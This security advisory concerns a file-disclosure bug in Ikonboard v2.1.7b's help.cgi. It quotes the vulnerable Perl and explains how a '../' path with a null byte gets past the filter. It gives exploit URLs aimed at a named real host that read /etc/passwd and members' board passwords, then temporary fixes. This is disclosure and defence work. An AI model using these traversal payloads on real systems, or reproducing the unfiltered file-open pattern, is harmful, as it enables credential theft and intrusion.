COMMAND

    Ikonboard

SYSTEMS AFFECTED

    Ikonboard v2.1.7b

PROBLEM

    Martin J.  Muench found  folllowing.   This is  another bug in the
    Ikonboard.  Anyone can read any file on the remote system with the
    privileges of the web server.

    File help.cgi (line 44):

        $inhelpon = $query -> param('helpon');

    As we can see, $inhelpon is the input for 'helpon' (lines 95-97):

        $filetoopen = "$ikondir" . "help/$inhelpon.dat";
        $filetoopen = &stripMETA($filetoopen);
        open (FILE, "$filetoopen") or die "Cannot locate the required files";

    Well, it sets the file, runs it through the filter and opens it.

    We are not  going to post  the whole filter  it uses because  they
    really have been  able to write  a filter that  is 24 lines  long.
    And they finally forgot to filter the backslash, so we can  easily
    just attach the  'poison null-byte' to  '$inhelpon' and we  escape
    the '.dat'.  And of course the scripts doesn't check for "..",  so
    we can specifiy every path we want.

    Example:

        http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00

    would  show  the  password  file,  if  it  is  readable  with  the
    privileges of the web server.

        http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/<member>.cgi%00

    replace <member>  with the  member name  and it  shows you his/her
    board-password (works with Administrator accounts too).

    Version 2.16b is vulnerable to this attack as well.

SOLUTION

    Not  yet  available.   You  could  fix  the  script  temporary  by
    inserting the following line under line 45 in 'help.cgi':

        $inhelpon =~ s/\///g;

    This is lame, but it works.  Another fix for this was is simply to
    insert as line 45:

        if($inhelpon =~ /\.\./) { &hackdetected; }

    then at the bottome append:

        sub hackdetected {
        print "Content-type: text/plain\n\n";
        print "sorry, this hole was patched :)\n";
        print "you have been logged.\n";
        exit;
        }

    Ok course you could change this to whatever..